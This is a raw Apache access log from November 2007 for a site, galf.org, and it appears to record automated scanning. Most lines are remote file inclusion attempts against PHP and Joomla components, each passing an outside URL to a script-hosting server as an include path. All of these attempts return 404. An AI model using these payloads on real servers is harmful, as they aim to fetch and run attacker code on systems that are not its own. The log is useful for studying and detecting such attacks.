209.250.239.170 - - [11/Nov/2007:17:54:45 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:55:02 -0800] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:17:56:19 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://71.41.190.203/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.39.140.181 - - [11/Nov/2007:17:56:19 -0800] "GET /modules/My_eGallery/index.php?basepath=http://71.41.190.203/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:17:56:19 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://71.41.190.203/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.39.140.181 - - [11/Nov/2007:17:56:22 -0800] "GET /logs/access_070730.log/modules/My_eGallery/index.php?basepath=http://71.41.190.203/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:56:27 -0800] "GET /logs/access_071001.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:58:44 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:58:44 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.23.230 - - [11/Nov/2007:18:01:30 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.250.239.170 - - [11/Nov/2007:18:01:31 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.250.239.170 - - [11/Nov/2007:18:01:31 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:18:01:49 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:18:01:49 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.67.202.81 - - [11/Nov/2007:18:02:18 -0800] "GET /newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
87.117.202.152 - - [11/Nov/2007:18:02:37 -0800] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:18:02:56 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:18:02:56 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:18:02:56 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.67.202.81 - - [11/Nov/2007:18:03:08 -0800] "GET /newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
212.67.202.81 - - [11/Nov/2007:18:03:08 -0800] "GET /newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:18:03:57 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
204.209.9.68 - - [11/Nov/2007:18:03:57 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
69.237.229.58 - - [11/Nov/2007:18:05:16 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://titanjack.t35.com/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
69.93.203.42 - - [11/Nov/2007:18:05:56 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.203.42 - - [11/Nov/2007:18:05:56 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:18:06:36 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:18:06:37 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.101 - - [11/Nov/2007:18:06:45 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.54.5 - - [11/Nov/2007:18:07:17 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.54.5 - - [11/Nov/2007:18:07:17 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:18:07:38 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.214.94.118 - - [11/Nov/2007:18:07:38 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
69.93.203.42 - - [11/Nov/2007:18:07:46 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:18:07:47 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.54.5 - - [11/Nov/2007:18:08:48 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.15.54.5 - - [11/Nov/2007:18:08:48 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
67.15.54.5 - - [11/Nov/2007:18:10:19 -0800] "GET /logs/index2.php?x=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.54.5 - - [11/Nov/2007:18:10:19 -0800] "GET /index2.php?x=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
192.154.64.20 - - [11/Nov/2007:18:10:35 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
192.154.64.20 - - [11/Nov/2007:18:10:35 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:18:10:42 -0800] "GET /logs/index2.php?x=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:18:10:42 -0800] "GET /index2.php?x=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
85.214.94.118 - - [11/Nov/2007:18:10:52 -0800] "GET /logs/index2.php?x=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:18:10:52 -0800] "GET /index2.php?x=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.25.80 - - [11/Nov/2007:18:11:11 -0800] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.67.202.81 - - [11/Nov/2007:18:11:48 -0800] "GET /logs/access_071015.log/newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
212.67.202.81 - - [11/Nov/2007:18:11:48 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
70.86.234.242 - - [11/Nov/2007:18:12:15 -0800] "GET /logs/index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [11/Nov/2007:18:12:16 -0800] "GET /index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.86.234.242 - - [11/Nov/2007:18:12:25 -0800] "GET /logs/index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [11/Nov/2007:18:12:26 -0800] "GET /index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [11/Nov/2007:18:12:26 -0800] "GET /logs/index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
70.86.234.242 - - [11/Nov/2007:18:12:26 -0800] "GET /index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
212.67.202.81 - - [11/Nov/2007:18:12:58 -0800] "GET /logs/access_071022.log/newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
70.86.234.242 - - [11/Nov/2007:18:13:07 -0800] "GET /logs/access_070826.log/index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.240.236.3 - - [11/Nov/2007:18:13:11 -0800] "GET /logs/index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:13:11 -0800] "GET /index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.234.242 - - [11/Nov/2007:18:13:14 -0800] "GET /logs/access_070806.log/index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
203.218.228.42 - - [11/Nov/2007:18:13:16 -0800] "GET /logs/access_071001.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://majorna414.com/bilder/DSC_018.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:13:22 -0800] "GET /logs/index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:13:22 -0800] "GET /index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:13:22 -0800] "GET /logs/index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.240.236.3 - - [11/Nov/2007:18:13:22 -0800] "GET /index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
70.86.234.242 - - [11/Nov/2007:18:14:06 -0800] "GET /logs/access_071022.log/index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [11/Nov/2007:18:14:06 -0800] "GET /logs/access_071008.log/index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.218.228.42 - - [11/Nov/2007:18:14:18 -0800] "GET //admincp/auth/secure.php?cfgProgDir=http://billsystemhk.com:2800/template//components/sansevero.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.218.228.42 - - [11/Nov/2007:18:14:19 -0800] "GET /main.php?pagina=http://billsystemhk.com:2800/template//components/sansevero.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.218.228.42 - - [11/Nov/2007:18:14:21 -0800] "GET /beacon/language/1/splash.lang.php?languagePath=http://billsystemhk.com:2800/template//components/sansevero.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.19.32.16 - - [11/Nov/2007:18:14:21 -0800] "GET /logs/access_070604.log HTTP/1.1" 200 311019 "http://www.google.it/search?hl=it&q=201.17.147.24&btnG=Cerca+con+Google&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ADVPLUGIN|K115|69|S-670875620|dialno; .NET CLR 2.0.50727; InfoPath.2)" "www.galf.org"
203.218.228.42 - - [11/Nov/2007:18:14:22 -0800] "GET //status//components/com_facileforms/facileforms.frame.php?=http://billsystemhk.com:2800/template//components/sansevero.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.218.228.42 - - [11/Nov/2007:18:14:28 -0800] "GET //SQuery/lib/gore.php?=http://billsystemhk.com:2800/template//components/sansevero.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
193.254.236.11 - - [11/Nov/2007:18:14:32 -0800] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gamezspace.net/test/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:18:14:36 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.254.236.11 - - [11/Nov/2007:18:14:42 -0800] "GET /logs/access_070903.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gamezspace.net/test/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:16:34 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.234.242 - - [11/Nov/2007:18:17:02 -0800] "GET /logs/index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.86.234.242 - - [11/Nov/2007:18:17:02 -0800] "GET /index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:18:17:08 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:18:17:08 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.234.242 - - [11/Nov/2007:18:17:33 -0800] "GET /logs/index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.86.234.242 - - [11/Nov/2007:18:17:33 -0800] "GET /index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
81.171.99.120 - - [11/Nov/2007:18:17:51 -0800] "GET /logs/access_070611.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.99.120 - - [11/Nov/2007:18:17:51 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.99.120 - - [11/Nov/2007:18:17:51 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:18:13 -0800] "GET /logs/index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:18:13 -0800] "GET /index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:18:13 -0800] "GET /logs/index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.240.236.3 - - [11/Nov/2007:18:18:13 -0800] "GET /index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
80.67.20.99 - - [11/Nov/2007:18:19:06 -0800] "GET /logs///////////////com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://71.41.190.203/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "galf.org"
80.67.20.99 - - [11/Nov/2007:18:19:06 -0800] "GET ///////////////com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://71.41.190.203/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "galf.org"
209.62.6.178 - - [11/Nov/2007:18:19:06 -0800] "GET /logs/access_070730.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.62.6.178 - - [11/Nov/2007:18:19:07 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.6.178 - - [11/Nov/2007:18:19:07 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
81.171.99.120 - - [11/Nov/2007:18:19:07 -0800] "GET /logs/access_070611.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.99.120 - - [11/Nov/2007:18:19:07 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.99.120 - - [11/Nov/2007:18:19:08 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.6.178 - - [11/Nov/2007:18:19:26 -0800] "GET /logs/access_070910.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.62.6.178 - - [11/Nov/2007:18:19:39 -0800] "GET /logs/access_070730.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.6.178 - - [11/Nov/2007:18:19:39 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.6.178 - - [11/Nov/2007:18:19:40 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.62.6.178 - - [11/Nov/2007:18:20:30 -0800] "GET /logs/access_070910.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:18:20:48 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.213.88.13 - - [11/Nov/2007:18:20:48 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
204.209.9.68 - - [11/Nov/2007:18:21:03 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:18:21:03 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
209.62.6.178 - - [11/Nov/2007:18:21:12 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.26.145.91 - - [11/Nov/2007:18:22:16 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:18:22:16 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:22:28 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.67.20.99 - - [11/Nov/2007:18:23:26 -0800] "GET /logs///////////////com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://71.41.190.203/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
80.67.20.99 - - [11/Nov/2007:18:23:26 -0800] "GET ///////////////com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://71.41.190.203/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:18:24:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:18:24:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.15.54.5 - - [11/Nov/2007:18:24:13 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.54.5 - - [11/Nov/2007:18:24:13 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:18:26:25 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:18:26:25 -0800] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
69.93.203.42 - - [11/Nov/2007:18:27:24 -0800] "GET /logs/index2.php?url_page=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:18:27:24 -0800] "GET /index2.php?url_page=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
